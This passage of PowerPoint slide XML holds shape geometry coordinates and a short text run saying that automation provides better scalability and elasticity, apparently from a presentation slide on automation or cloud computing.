                  <a:pt x="9473817" y="812734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9504106" y="782445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9523965" y="744024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9531096" y="699770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9531096" y="139954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9523965" y="95699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9504106" y="57278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9473817" y="26989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9435396" y="7130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9391142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956428" y="3440429"/>
            <a:ext cx="682625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Automation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provides</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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better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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>scalability</a:t>
            </a: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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>elasticity.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785229" y="4647057"/>
            <a:ext cx="3406140" cy="3036570"/>
            <a:chOff x="6785229" y="4647057"/>
            <a:chExt cx="3406140" cy="3036570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6794754" y="4656582"/>
              <a:ext cx="3017520" cy="3017520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3017520" h="3017520">
                  <a:moveTo>
                    <a:pt x="0" y="1508759"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="745" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575088" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508760" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016774" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3017520" y="1508759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016774" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508760" y="3017519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575088" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1508759"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="3946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497314" y="5247513"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838959">
                  <a:moveTo>
                    <a:pt x="3428" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32410" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59972" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86116" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110840" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134146" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156034" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176503" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195554" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213186" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229400" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244196" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257574" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269535" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280077" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289201" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296908" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303198" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308070" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311524" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313562" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313385" y="966272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311171" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307540" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302492" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296028" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288147" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278849" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268135" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256005" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242458" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227496" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211117" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193322" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174111" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153485" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131443" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107985" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83112" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56823" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29119" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="76200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428988" y="5783580"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="381000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968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9717785" y="5972302"/>
            <a:ext cx="1847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25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416040" y="5209413"/>
            <a:ext cx="762000" cy="1915160"/>
            <a:chOff x="6416040" y="5209413"/>
            <a:chExt cx="762000" cy="1915160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6794008" y="5247513"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838959">
                  <a:moveTo>
                    <a:pt x="310753" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281771" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254209" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228065" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
